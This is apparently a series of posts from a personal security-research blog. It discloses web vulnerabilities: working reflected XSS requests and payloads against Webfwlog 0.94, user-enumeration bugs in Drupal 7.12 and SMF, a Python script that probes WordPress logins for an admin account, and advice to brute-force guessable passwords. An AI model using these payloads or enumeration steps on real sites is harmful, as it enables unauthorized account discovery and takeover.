[EN] Simple quick Apache log reading

As far as I can see at logs of my Apache, last few weeks was very busy for few guys trying to hack my honeypot ;) 

Good job guys!

For some reason I decided to create a very simple (but useful) 'log-reader' for Apache.

You can obviously add it to cron or just run as a normal Bash script. 
Here you have a code:

---<code>---
#!/bin/sh

ACCESS="/var/log/apache2/access.log"
FOUND="found.log"
UNIQ="uniq.log"

echo
echo "**** Test Apache logs... ****"
echo

cut -d' ' -f1 $ACCESS > $FOUND

cat $FOUND | uniq > $UNIQ
echo "[+] Found host(s) : " `wc -l $UNIQ`

for host in `cat $UNIQ`; do
  echo "--------------------------------------------------------------"
  echo "[+] Testing : " $host
  host $host
  whois $host | grep -e "country\|address"
  echo ""
  echo "[+] looking for: "
  grep $host $ACCESS | cut -d' ' -f 6-8
  echo "--------------------------------------------------------------"
done

---<code>---

[EN] webfwlog-0.94 bugs

Last days I found 2 XSS in Webfwlog Firewall Log Analyzer.

1. XSS is here:

---<request>---
 GET /cms2/webfwlog-0.94/webfwlog/index.php?show_select_data_source="%3e%3cbody%2fonload%3dalert(3)%3e&restore=yes HTTP/1.1
Host: 10.149.14.58
(...)
Connection: close
---<request>---

Response should look like this:
---<response>---
<td align=left colspan="4">
<input type="hidden" name="show_select_data_source" value=""><body/onload=alert(3)>">
    <input type="submit" name="action" value="Select Data Source">
&nbsp;&nbsp;&nbsp;
---<response>---

2nd XSS is here:


---<request>--- 
POST /cms2/webfwlog-0.94/webfwlog/index.php HTTP/1.1
Host: 10.149.14.58
(...)
Content-Length: 173

page=home&report_order=Last+Accessed&show_select_data_source="%3e%3cbody%2fonload%3dalert(3)%3e&action=Select+Data+Source&ulog_table=&data_source=syslog&syslog_file=messages
---<request>---  


And response for this one:

---<response>---

<td align=left colspan="4">
<input type="hidden" name="show_select_data_source" value=""><body/onload=alert(3)>">
    <input type="submit" name="action" value="Select Data Source">
&nbsp;&nbsp;&nbsp;


---<response>---

So as we can see this is the same parameter use (but not filtered) in two places.

Anyway, cool code! ;)

[EN] Quick news

Hi,

today only one "quick news" ;)

Those information will be here as soon as possible, but for "Your information"
(and for "maybe this version is 'version of Your CMS' and You need quick-patch";))
here are listed few vulnerabilities I found this month.
If You need it fast- let me know, as always, via e-mail;)

So:
For (now ;)) 04.2012:
01.04 -Joomla 2.5.3 Information disclosure
04.04 -JooDatabase SQL Injection
06.04 -VirtueMart 2.0.2 Information disclosure
07.04 -jNews - Information disclosure
07.04 -Joomla 2.5.4 - Multiple...
07.04 -nBill Lite - HTML Injection / XSS
07.04 -VirtueMart 2.0.2 Information disclosure
11.04 -eFront CMS 3.6.10 Information disclosure
11.04 - eFront CMS 4.6.10 - User enumeration
14.04 -ATutor 2.0.4 XSS
15.04 -Docebo LMS 3605 - HTML Injection
15.04 - Docebo LMS 3605 - SQL Injection 
16.04 -e107 - reflected XSS
18.04 - HikaShop - Information disclosure


...to be continued... ;)


For 03.2012:
29.03 - gpEasy 2.3.3 XSS
27.03 - eXtreme-fusion 4.5 XSS
26.03 - Joomla 2.5.3 few XSS
25.03 - Quick Cart 5.0 Information disclosure

25.04 - Quick Cart 5.0 CMS XSS

25.04 - Yaqas CMS (Alpha1) - multiple...

18.03 - Quick Cart 5.0 Information disclosure

18.03 - Quick CMS 4.0 XSS


So if You will find here any CMS that You are using right now - let me know
if You want test/patch it.

[EN] SMF CMS 1.1.4 - User enumeration

... or 'user-grabber'.

'How to' do it it's not a secret because SMF provides possibility
of checking what are names of users 'registered'.

Anyway, if You are testing for example passwords in SMF installation,
You can do this steps for Your users (I mean: You are an admin of SMF You're checking...;))

(Example presented here actually won't give You "usernames",
You will get only 'ID's of registered (available) users. I thought givint tool to
'remote get all users' won't be a good idea ;))

a) code presented below should helps You how to automate 'user grabbing':

http://pastebin.com/VDfVg2hc

 b) output:

 

SMF 1.1.4 CMS - user grabber 

Now. For what it can be used.

If You're checking 'possible' (weak) passwords for 'all enumerated users'

You can try a little brute force for passwords (based on usernames) like this:

if user (name) grabbed  in scan then try to log in as him with password like user1, user123, 

resu, password... and all 'guessable' passwords.

If You're doing some pentest with 'password checking' scenarios, maybe this

should helps You a little (in automate some work) ;)

Let me know if You need help with implementing this for 2.0.2 in comments or mail.

More information about other 'enumeration-bugs' from March/April
You can find also here.

Enjoy!

o/

[EN] Drupal 7.12 - enumeration/counter bug for (registered only)

As I wrote here, there is few bugs in latest Drupal (7.12).
I sad I will public it in April, but... enjoy today ;)

# TITLE ....... # Drupal 7.12 enumeration/counter bug for registered only.... #
# DATE ........ # 12.03.2012 ................................................... #
# AUTOHR ...... # http://hauntit.blogspot.com ............................... #
# SOFT LINK ... # http://drupal.org ......................................... #
# VERSION ..... # 7.12....................................................... #
# TESTED ON ... # LAMP ...................................................... #
# ........................................................................... #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
This is user enumeration or 'encouting bug' (the same situation is
in latest Wordpress (3.3.1) that I've described at my blog:

#............................................#
# 3. Where is bug :)
In admin panel we can set permitions for user like this:
- user can see other profiles
- user can not ;]

Vulnerability (if 'can see') can be used to get names of other users in webapp.
Vulnerability (if 'can not') can be used to count users (like in WP3.3.1)

Bug is because of way of how Drupal is informing user about an error.
If we can 'GET' to id-of-other-user, we can see 'Access Denied' or 'Page not found'.
http://drupal-7.12/?q=user/1  <-- user exist : "Access Denied"
http://drupal-7.12/?q=user/123123123 <-- user not exist : "Page could not be found"

Got it? ;)
#............................................#
# 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#............................................#
# Best regards
#

[EN] Drupal 7.12 user-enumeration

Yep, another day of testing Drupal code, and today I found user-enumeration bug.

Drupal seems to be vulnerable to user enumeration but this vulnerability is dedicated to logged-in users only:)


If You want to check it at Your installation, let me know ... ;)
Just like it was with Wordpress bugs.


I will present more technical details in April.

Maybe this one today:

 ;)

 Questions? Priv.

[PL] Wordpress 3.3.1 no-0day exploits - [Aktualizacja]

Szybka piątkowa notka ;)

Zgodnie z tym co wspominałem, w marcu miałem zamiar opublikować szczegóły związane ze znalezionymi
błędami w ostatniej (3.3.1) wersji Wordpress'a. Postanowiłem jednak podzielić się informacją z pierwszymi 6cioma osobami, które fajnie umotywują swoją chęć poznania tychże "strasznych luk" ;P

Nie taki błąd straszny jak go malują... ;)
Tak więc "bilans" przedstawia się następująco:

Mamy "XSS'a dla użytkownika zarejestrowanego", mamy "information disclosure", mamy enumeracje userów i zabawę z parametrami... ;)

Czas "stop" w poniedziałek o 23:59. Maile kierujcie tutaj! ;)

Miłego weekendu! o/

* Uprade 5.03 - 21:20 * 

Obiecałem sobie, że nie sprawdzę poczty, dopóki nie minie obiecana "godzina 0".
Ale coś mnie podkusiło...

Niesamowite, że odezwało się aż tyle osób! ;D Czyżbyście wszyscy mieli Wordpress'a? ;]

Obiecane "kto pierwszy ten lepszy" przesyłam od razu. ;)

Nastąpiła jednak mała zmiana - niespodzianka:
Z racji tak dużego zainteresowania z Waszej strony, wysyłam kod+info Wszystkim,
którzy do tej pory do mnie napisali ;)

Bawcie się się dobrze, byle legalnie! ;)

o/

[EN] Wordpress 3.3.1 no-0day exploits - Updated - 12.03!

Quick note from Friday ;)

As I mentioned here in March I decided to post some "more technical" details, but...
only for the first 6 of You who send me message about why I should send 'details' to him ;>

Still no free-days :< :*

From now to Monday 23:59 Central UE time...
Enjoy Your weekend! ;)

Cheers!


* Update 5.03 - 21:20 *

I promised myself, that I don't check my e-mail, until there won't be "hour 0".
But something tempted me...

It's amazing, that there is so many answers/requests! ;D I understand that all of You installed WP? ;]

Like I sad "first come first served", so You should check Your mail's now. ;)

Also... :) There is a little "modification - surprise":
Because there was so many requests of code and/or info, I will send it to all people,
who asked me about it. For now. ;)

Have fun, any legally! ;)

o/


*Update 12.03.2012*
If You want more information about WordPress vulnerabilities, check  this tag!;)
 

WordPress 3.2.1 user enumeration vulnerability

Like we all know, not only banks have an user enumeration vulnerabilities in their webapplications :)
Almost all the time „user enumeration” is possible, be cause of bad informing about ‘wrong credentials’ in login process.
So, lets see how it lookgs in new WordPress (3.2.1).

(In pseudo code):
if user_ok --> echo 'user ok'
else if user_bad --> echo 'username invalid'
...
So thats the simple way to enumerate users (bruteforce as welcome) ;)
Here I wrote a simple tool, to check if there is an admin account:

# -------------------------------------------- # sword.py - wordpress > 3.2.1 user enumeration # -------------------------------------------- # 2o.o9.2o11 - v1 . import urllib # urlencode import urllib2 import sys # url = 'http://hello/wordpress/wp-login.php' url = sys.argv[1] + '/wp-login.php' values = { 'log' : 'admin', 'pwd' : 'just-testing...', 'wp-submit' : 'Log+in', # 'redirect_to' : 'http%3A%2F%2Fhello%2Fwordpress%2Fwp-admin%2F', 'redirect_to' : sys.argv[1] + 'wp-admin/', 'testcookie' : '1' } user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' naglowki = { 'User-Agent' : user_agent} data = urllib.urlencode(values) request = urllib2.Request(url, data,naglowki) response = urllib2.urlopen(request) html = response.read() a = "incorrect" in html print "" print "------- sword.py - 2o.o9.2o11 - v1 -------" print "simple wordpress > 3.2.1 enumeration tool" print "------------------------------------------" print "Is there an admin account? " print a

Like You see, this simple tool can enumerate only ‘admin’. So the idea is simple. Check if there is a name(wordlist?;) ), and if it is – analyse/log the answer.

Regards! 

*Update 12.03.2012*

If You want more information about vulnerabilities in latest WordPress,
try here ;)